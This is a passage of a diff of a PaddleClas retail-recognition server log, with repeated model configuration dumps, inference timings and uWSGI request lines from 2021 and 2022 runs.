/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:02:59 INFO: return_k : 5 -2021-11-03 04:02:59 INFO: score_thres : 0.5 -2021-11-03 04:02:59 INFO: RecPostProcess : None -2021-11-03 04:02:59 INFO: RecPreProcess : -2021-11-03 04:02:59 INFO: transform_ops : -2021-11-03 04:02:59 INFO: ResizeImage : -2021-11-03 04:02:59 INFO: size : 224 -2021-11-03 04:02:59 INFO: NormalizeImage : -2021-11-03 04:02:59 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:02:59 INFO: order : -2021-11-03 04:02:59 INFO: scale : 0.00392157 -2021-11-03 04:02:59 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:02:59 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2379.9116611480713 ms per batch image +2022-02-08 13:57:19 INFO: DetPostProcess : +2022-02-08 13:57:19 INFO: DetPreProcess : +2022-02-08 13:57:19 INFO: transform_ops : +2022-02-08 13:57:19 INFO: DetResize : +2022-02-08 13:57:19 INFO: interp : 2 +2022-02-08 13:57:19 INFO: keep_ratio : False +2022-02-08 13:57:19 INFO: target_size : [640, 640] +2022-02-08 13:57:19 INFO: DetNormalizeImage : +2022-02-08 13:57:19 INFO: is_scale : True +2022-02-08 13:57:19 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 13:57:19 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 13:57:19 INFO: DetPermute : +2022-02-08 13:57:19 INFO: Global : +2022-02-08 13:57:19 INFO: batch_size : 1 +2022-02-08 13:57:19 INFO: cpu_num_threads : 1 +2022-02-08 13:57:19 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-08 13:57:19 INFO: enable_benchmark : True +2022-02-08 13:57:19 INFO: enable_mkldnn : True +2022-02-08 13:57:19 INFO: enable_profile : False +2022-02-08 13:57:19 INFO: gpu_mem : 8000 +2022-02-08 13:57:19 INFO: image_shape : [3, 640, 640] +2022-02-08 13:57:19 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-08 13:57:19 INFO: ir_optim : True +2022-02-08 13:57:19 INFO: labe_list : ['foreground'] +2022-02-08 13:57:19 INFO: max_det_results : 5 +2022-02-08 13:57:19 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-08 13:57:19 INFO: rec_nms_thresold : 0.05 +2022-02-08 13:57:19 INFO: 
threshold : 0.2 +2022-02-08 13:57:19 INFO: use_fp16 : False +2022-02-08 13:57:19 INFO: use_gpu : False +2022-02-08 13:57:19 INFO: use_tensorrt : False +2022-02-08 13:57:19 INFO: IndexProcess : +2022-02-08 13:57:19 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-08 13:57:19 INFO: return_k : 5 +2022-02-08 13:57:19 INFO: score_thres : 0.5 +2022-02-08 13:57:19 INFO: RecPostProcess : None +2022-02-08 13:57:19 INFO: RecPreProcess : +2022-02-08 13:57:19 INFO: transform_ops : +2022-02-08 13:57:19 INFO: ResizeImage : +2022-02-08 13:57:19 INFO: size : 224 +2022-02-08 13:57:19 INFO: NormalizeImage : +2022-02-08 13:57:19 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 13:57:19 INFO: order : +2022-02-08 13:57:19 INFO: scale : 0.00392157 +2022-02-08 13:57:19 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 13:57:19 INFO: ToCHWImage : None +Inference: 374.39537048339844 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 9/16] 210.51.42.176 () {34 vars in 431 bytes} [Wed Nov 3 04:02:58 2021] POST /reference_client/ => generated 98 bytes in 6120 msecs (HTTP/1.1 200) 5 headers in 157 bytes (11 switches on core 0) -[pid: 32765|app: 0|req: 10/17] 106.12.223.201 () {36 vars in 488 bytes} [Wed Nov 3 04:13:19 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 7/18] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 04:13:21 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 709/834] 125.94.202.110 () {34 vars in 450 bytes} [Tue Feb 8 13:57:18 2022] POST /reference_client/ => generated 98 bytes in 3040 msecs (HTTP/1.1 200) 5 headers in 157 bytes (17 switches on core 0) req -2021-11-03 04:23:09 INFO: +2022-02-08 13:57:25 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle 
! == =========================================================== @@ -2112,77 +4003,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:23:09 INFO: DetPostProcess : -2021-11-03 04:23:09 INFO: DetPreProcess : -2021-11-03 04:23:09 INFO: transform_ops : -2021-11-03 04:23:09 INFO: DetResize : -2021-11-03 04:23:09 INFO: interp : 2 -2021-11-03 04:23:09 INFO: keep_ratio : False -2021-11-03 04:23:09 INFO: target_size : [640, 640] -2021-11-03 04:23:09 INFO: DetNormalizeImage : -2021-11-03 04:23:09 INFO: is_scale : True -2021-11-03 04:23:09 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:23:09 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:23:09 INFO: DetPermute : -2021-11-03 04:23:09 INFO: Global : -2021-11-03 04:23:09 INFO: batch_size : 1 -2021-11-03 04:23:09 INFO: cpu_num_threads : 10 -2021-11-03 04:23:09 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:23:09 INFO: enable_benchmark : True -2021-11-03 04:23:09 INFO: enable_mkldnn : True -2021-11-03 04:23:09 INFO: enable_profile : False -2021-11-03 04:23:09 INFO: gpu_mem : 8000 -2021-11-03 04:23:09 INFO: image_shape : [3, 640, 640] -2021-11-03 04:23:09 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:23:09 INFO: ir_optim : True -2021-11-03 04:23:09 INFO: labe_list : ['foreground'] -2021-11-03 04:23:09 INFO: max_det_results : 5 -2021-11-03 04:23:09 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:23:09 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:23:09 INFO: threshold : 0.2 -2021-11-03 04:23:09 INFO: use_fp16 : False -2021-11-03 04:23:09 INFO: use_gpu : False -2021-11-03 04:23:09 INFO: use_tensorrt : False -2021-11-03 04:23:09 INFO: IndexProcess : -2021-11-03 04:23:09 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:23:09 INFO: return_k : 5 -2021-11-03 04:23:09 INFO: score_thres : 0.5 -2021-11-03 04:23:09 INFO: RecPostProcess : None -2021-11-03 04:23:09 INFO: RecPreProcess : -2021-11-03 04:23:09 INFO: transform_ops : -2021-11-03 04:23:09 INFO: ResizeImage : -2021-11-03 04:23:09 INFO: size : 224 -2021-11-03 04:23:09 INFO: NormalizeImage : -2021-11-03 04:23:09 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:23:09 INFO: order : -2021-11-03 04:23:09 INFO: scale : 0.00392157 -2021-11-03 04:23:09 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:23:09 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2216.3712978363037 ms per batch image +2022-02-08 13:57:25 INFO: DetPostProcess : +2022-02-08 13:57:25 INFO: DetPreProcess : +2022-02-08 13:57:25 INFO: transform_ops : +2022-02-08 13:57:25 INFO: DetResize : +2022-02-08 13:57:25 INFO: interp : 2 +2022-02-08 13:57:25 INFO: keep_ratio : False +2022-02-08 13:57:25 INFO: target_size : [640, 640] +2022-02-08 13:57:25 INFO: DetNormalizeImage : +2022-02-08 13:57:25 INFO: is_scale : True +2022-02-08 13:57:25 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 13:57:25 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 13:57:25 INFO: DetPermute : +2022-02-08 13:57:25 INFO: Global : +2022-02-08 13:57:25 INFO: batch_size : 1 +2022-02-08 13:57:25 INFO: cpu_num_threads : 1 +2022-02-08 13:57:25 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-08 13:57:25 INFO: enable_benchmark : True +2022-02-08 13:57:25 INFO: enable_mkldnn : True +2022-02-08 13:57:25 INFO: enable_profile : False +2022-02-08 13:57:25 INFO: gpu_mem : 8000 +2022-02-08 13:57:25 INFO: image_shape : [3, 640, 640] +2022-02-08 13:57:25 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-08 13:57:25 INFO: ir_optim : True +2022-02-08 13:57:25 INFO: labe_list : ['foreground'] +2022-02-08 13:57:25 INFO: max_det_results : 5 +2022-02-08 13:57:25 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-08 13:57:25 INFO: rec_nms_thresold : 0.05 +2022-02-08 13:57:25 INFO: 
threshold : 0.2 +2022-02-08 13:57:25 INFO: use_fp16 : False +2022-02-08 13:57:25 INFO: use_gpu : False +2022-02-08 13:57:25 INFO: use_tensorrt : False +2022-02-08 13:57:25 INFO: IndexProcess : +2022-02-08 13:57:25 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-08 13:57:25 INFO: return_k : 5 +2022-02-08 13:57:25 INFO: score_thres : 0.5 +2022-02-08 13:57:25 INFO: RecPostProcess : None +2022-02-08 13:57:25 INFO: RecPreProcess : +2022-02-08 13:57:25 INFO: transform_ops : +2022-02-08 13:57:25 INFO: ResizeImage : +2022-02-08 13:57:25 INFO: size : 224 +2022-02-08 13:57:25 INFO: NormalizeImage : +2022-02-08 13:57:25 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 13:57:25 INFO: order : +2022-02-08 13:57:25 INFO: scale : 0.00392157 +2022-02-08 13:57:25 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 13:57:25 INFO: ToCHWImage : None +Inference: 373.9502429962158 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 11/19] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:23:08 2021] POST /reference_client/ => generated 98 bytes in 5714 msecs (HTTP/1.1 200) 5 headers in 157 bytes (10 switches on core 0) -[pid: 32765|app: 0|req: 12/20] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 04:26:11 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 8/21] 106.12.223.202 () {36 vars in 488 bytes} [Wed Nov 3 04:26:13 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 710/835] 125.94.202.110 () {34 vars in 450 bytes} [Tue Feb 8 13:57:24 2022] POST /reference_client/ => generated 98 bytes in 3036 msecs (HTTP/1.1 200) 5 headers in 157 bytes (21 switches on core 0) req -2021-11-03 04:33:50 INFO: +2022-02-08 13:59:23 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle 
! == =========================================================== @@ -2192,75 +4065,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:33:50 INFO: DetPostProcess : -2021-11-03 04:33:50 INFO: DetPreProcess : -2021-11-03 04:33:50 INFO: transform_ops : -2021-11-03 04:33:50 INFO: DetResize : -2021-11-03 04:33:50 INFO: interp : 2 -2021-11-03 04:33:50 INFO: keep_ratio : False -2021-11-03 04:33:50 INFO: target_size : [640, 640] -2021-11-03 04:33:50 INFO: DetNormalizeImage : -2021-11-03 04:33:50 INFO: is_scale : True -2021-11-03 04:33:50 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:33:50 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:33:50 INFO: DetPermute : -2021-11-03 04:33:50 INFO: Global : -2021-11-03 04:33:50 INFO: batch_size : 1 -2021-11-03 04:33:50 INFO: cpu_num_threads : 10 -2021-11-03 04:33:50 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:33:50 INFO: enable_benchmark : True -2021-11-03 04:33:50 INFO: enable_mkldnn : True -2021-11-03 04:33:50 INFO: enable_profile : False -2021-11-03 04:33:50 INFO: gpu_mem : 8000 -2021-11-03 04:33:50 INFO: image_shape : [3, 640, 640] -2021-11-03 04:33:50 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:33:50 INFO: ir_optim : True -2021-11-03 04:33:50 INFO: labe_list : ['foreground'] -2021-11-03 04:33:50 INFO: max_det_results : 5 -2021-11-03 04:33:50 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:33:50 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:33:50 INFO: threshold : 0.2 -2021-11-03 04:33:50 INFO: use_fp16 : False -2021-11-03 04:33:50 INFO: use_gpu : False -2021-11-03 04:33:50 INFO: use_tensorrt : False -2021-11-03 04:33:50 INFO: IndexProcess : -2021-11-03 04:33:50 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:33:50 INFO: return_k : 5 -2021-11-03 04:33:50 INFO: score_thres : 0.5 -2021-11-03 04:33:50 INFO: RecPostProcess : None -2021-11-03 04:33:50 INFO: RecPreProcess : -2021-11-03 04:33:50 INFO: transform_ops : -2021-11-03 04:33:50 INFO: ResizeImage : -2021-11-03 04:33:50 INFO: size : 224 -2021-11-03 04:33:50 INFO: NormalizeImage : -2021-11-03 04:33:50 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:33:50 INFO: order : -2021-11-03 04:33:50 INFO: scale : 0.00392157 -2021-11-03 04:33:50 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:33:50 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2467.1430587768555 ms per batch image +2022-02-08 13:59:23 INFO: DetPostProcess : +2022-02-08 13:59:23 INFO: DetPreProcess : +2022-02-08 13:59:23 INFO: transform_ops : +2022-02-08 13:59:23 INFO: DetResize : +2022-02-08 13:59:23 INFO: interp : 2 +2022-02-08 13:59:23 INFO: keep_ratio : False +2022-02-08 13:59:23 INFO: target_size : [640, 640] +2022-02-08 13:59:23 INFO: DetNormalizeImage : +2022-02-08 13:59:23 INFO: is_scale : True +2022-02-08 13:59:23 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 13:59:23 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 13:59:23 INFO: DetPermute : +2022-02-08 13:59:23 INFO: Global : +2022-02-08 13:59:23 INFO: batch_size : 1 +2022-02-08 13:59:23 INFO: cpu_num_threads : 1 +2022-02-08 13:59:23 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-08 13:59:23 INFO: enable_benchmark : True +2022-02-08 13:59:23 INFO: enable_mkldnn : True +2022-02-08 13:59:23 INFO: enable_profile : False +2022-02-08 13:59:23 INFO: gpu_mem : 8000 +2022-02-08 13:59:23 INFO: image_shape : [3, 640, 640] +2022-02-08 13:59:23 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-08 13:59:23 INFO: ir_optim : True +2022-02-08 13:59:23 INFO: labe_list : ['foreground'] +2022-02-08 13:59:23 INFO: max_det_results : 5 +2022-02-08 13:59:23 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-08 13:59:23 INFO: rec_nms_thresold : 0.05 +2022-02-08 13:59:23 INFO: 
threshold : 0.2 +2022-02-08 13:59:23 INFO: use_fp16 : False +2022-02-08 13:59:23 INFO: use_gpu : False +2022-02-08 13:59:23 INFO: use_tensorrt : False +2022-02-08 13:59:23 INFO: IndexProcess : +2022-02-08 13:59:23 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-08 13:59:23 INFO: return_k : 5 +2022-02-08 13:59:23 INFO: score_thres : 0.5 +2022-02-08 13:59:23 INFO: RecPostProcess : None +2022-02-08 13:59:23 INFO: RecPreProcess : +2022-02-08 13:59:23 INFO: transform_ops : +2022-02-08 13:59:23 INFO: ResizeImage : +2022-02-08 13:59:23 INFO: size : 224 +2022-02-08 13:59:23 INFO: NormalizeImage : +2022-02-08 13:59:23 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 13:59:23 INFO: order : +2022-02-08 13:59:23 INFO: scale : 0.00392157 +2022-02-08 13:59:23 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 13:59:23 INFO: ToCHWImage : None +Inference: 374.36413764953613 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32765|app: 0|req: 13/22] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:33:48 2021] POST /reference_client/ => generated 98 bytes in 6494 msecs (HTTP/1.1 200) 5 headers in 157 bytes (10 switches on core 0) +[pid: 19148|app: 0|req: 711/836] 125.94.202.110 () {34 vars in 450 bytes} [Tue Feb 8 13:59:22 2022] POST /reference_client/ => generated 98 bytes in 2995 msecs (HTTP/1.1 200) 5 headers in 157 bytes (21 switches on core 0) req -2021-11-03 04:34:18 INFO: +2022-02-08 14:04:50 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! 
== =========================================================== @@ -2270,124 +4127,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:34:18 INFO: DetPostProcess : -2021-11-03 04:34:18 INFO: DetPreProcess : -2021-11-03 04:34:18 INFO: transform_ops : -2021-11-03 04:34:18 INFO: DetResize : -2021-11-03 04:34:18 INFO: interp : 2 -2021-11-03 04:34:18 INFO: keep_ratio : False -2021-11-03 04:34:18 INFO: target_size : [640, 640] -2021-11-03 04:34:18 INFO: DetNormalizeImage : -2021-11-03 04:34:18 INFO: is_scale : True -2021-11-03 04:34:18 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:34:18 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:34:18 INFO: DetPermute : -2021-11-03 04:34:18 INFO: Global : -2021-11-03 04:34:18 INFO: batch_size : 1 -2021-11-03 04:34:18 INFO: cpu_num_threads : 10 -2021-11-03 04:34:18 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:34:18 INFO: enable_benchmark : True -2021-11-03 04:34:18 INFO: enable_mkldnn : True -2021-11-03 04:34:18 INFO: enable_profile : False -2021-11-03 04:34:18 INFO: gpu_mem : 8000 -2021-11-03 04:34:18 INFO: image_shape : [3, 640, 640] -2021-11-03 04:34:18 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:34:18 INFO: ir_optim : True -2021-11-03 04:34:18 INFO: labe_list : ['foreground'] -2021-11-03 04:34:18 INFO: max_det_results : 5 -2021-11-03 04:34:18 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:34:18 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:34:18 INFO: threshold : 0.2 -2021-11-03 04:34:18 INFO: use_fp16 : False -2021-11-03 04:34:18 INFO: use_gpu : False -2021-11-03 04:34:18 INFO: use_tensorrt : False -2021-11-03 04:34:18 INFO: IndexProcess : -2021-11-03 04:34:18 INFO: index_dir : 
/root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:34:18 INFO: return_k : 5 -2021-11-03 04:34:18 INFO: score_thres : 0.5 -2021-11-03 04:34:18 INFO: RecPostProcess : None -2021-11-03 04:34:18 INFO: RecPreProcess : -2021-11-03 04:34:18 INFO: transform_ops : -2021-11-03 04:34:18 INFO: ResizeImage : -2021-11-03 04:34:18 INFO: size : 224 -2021-11-03 04:34:18 INFO: NormalizeImage : -2021-11-03 04:34:18 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:34:18 INFO: order : -2021-11-03 04:34:18 INFO: scale : 0.00392157 -2021-11-03 04:34:18 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:34:18 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. 
---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2219.644069671631 ms per batch image +2022-02-08 14:04:50 INFO: DetPostProcess : +2022-02-08 14:04:50 INFO: DetPreProcess : +2022-02-08 14:04:50 INFO: transform_ops : +2022-02-08 14:04:50 INFO: DetResize : +2022-02-08 14:04:50 INFO: interp : 2 +2022-02-08 14:04:50 INFO: keep_ratio : False +2022-02-08 14:04:50 INFO: target_size : [640, 640] +2022-02-08 14:04:50 INFO: DetNormalizeImage : +2022-02-08 14:04:50 INFO: is_scale : True +2022-02-08 14:04:50 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 14:04:50 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 14:04:50 INFO: DetPermute : +2022-02-08 14:04:50 INFO: Global : +2022-02-08 14:04:50 INFO: batch_size : 1 +2022-02-08 14:04:50 INFO: cpu_num_threads : 1 +2022-02-08 14:04:50 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-08 14:04:50 INFO: enable_benchmark : True +2022-02-08 14:04:50 INFO: enable_mkldnn : True +2022-02-08 14:04:50 INFO: enable_profile : False +2022-02-08 14:04:50 INFO: gpu_mem : 8000 +2022-02-08 14:04:50 INFO: image_shape : [3, 640, 640] +2022-02-08 14:04:50 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-08 14:04:50 INFO: ir_optim : True +2022-02-08 14:04:50 INFO: labe_list : ['foreground'] +2022-02-08 14:04:50 INFO: max_det_results : 5 +2022-02-08 14:04:50 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-08 14:04:50 INFO: rec_nms_thresold : 0.05 +2022-02-08 14:04:50 INFO: 
threshold : 0.2 +2022-02-08 14:04:50 INFO: use_fp16 : False +2022-02-08 14:04:50 INFO: use_gpu : False +2022-02-08 14:04:50 INFO: use_tensorrt : False +2022-02-08 14:04:50 INFO: IndexProcess : +2022-02-08 14:04:50 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-08 14:04:50 INFO: return_k : 5 +2022-02-08 14:04:50 INFO: score_thres : 0.5 +2022-02-08 14:04:50 INFO: RecPostProcess : None +2022-02-08 14:04:50 INFO: RecPreProcess : +2022-02-08 14:04:50 INFO: transform_ops : +2022-02-08 14:04:50 INFO: ResizeImage : +2022-02-08 14:04:50 INFO: size : 224 +2022-02-08 14:04:50 INFO: NormalizeImage : +2022-02-08 14:04:50 INFO: mean : [0.485, 0.456, 0.406] +2022-02-08 14:04:50 INFO: order : +2022-02-08 14:04:50 INFO: scale : 0.00392157 +2022-02-08 14:04:50 INFO: std : [0.229, 0.224, 0.225] +2022-02-08 14:04:50 INFO: ToCHWImage : None +Inference: 373.6741542816162 ms per batch image [] 234 ["Please connect root to upload container's name and it's price!\n"] -[pid: 32766|app: 0|req: 9/23] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:34:17 2021] POST /reference_client/ => generated 98 bytes in 5945 msecs (HTTP/1.1 200) 5 headers in 157 bytes (8 switches on core 0) -2021-11-03 04:37:54 INFO: -=========================================================== -== PaddleClas is powered by PaddlePaddle ! == -=========================================================== -== == -== For more info please go to the following website. 
== -== == -== https://github.com/PaddlePaddle/PaddleClas == -=========================================================== - -2021-11-03 04:37:54 INFO: Global : -2021-11-03 04:37:54 INFO: batch_size : 32 -2021-11-03 04:37:54 INFO: cpu_num_threads : 10 -2021-11-03 04:37:54 INFO: enable_benchmark : True -2021-11-03 04:37:54 INFO: enable_mkldnn : True -2021-11-03 04:37:54 INFO: enable_profile : False -2021-11-03 04:37:54 INFO: gpu_mem : 8000 -2021-11-03 04:37:54 INFO: ir_optim : True -2021-11-03 04:37:54 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:37:54 INFO: use_fp16 : False -2021-11-03 04:37:54 INFO: use_gpu : True -2021-11-03 04:37:54 INFO: use_tensorrt : False -2021-11-03 04:37:54 INFO: IndexProcess : -2021-11-03 04:37:54 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt -2021-11-03 04:37:54 INFO: delimiter : -2021-11-03 04:37:54 INFO: dist_type : IP -2021-11-03 04:37:54 INFO: embedding_size : 512 -2021-11-03 04:37:54 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail -2021-11-03 04:37:54 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:37:54 INFO: index_method : HNSW32 -2021-11-03 04:37:54 INFO: index_operation : new -2021-11-03 04:37:54 INFO: RecPostProcess : None -2021-11-03 04:37:54 INFO: RecPreProcess : -2021-11-03 04:37:54 INFO: transform_ops : -2021-11-03 04:37:54 INFO: ResizeImage : -2021-11-03 04:37:54 INFO: size : 224 -2021-11-03 04:37:54 INFO: NormalizeImage : -2021-11-03 04:37:54 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:37:54 INFO: order : -2021-11-03 04:37:54 INFO: scale : 0.00392157 -2021-11-03 04:37:54 INFO: std : [0.229, 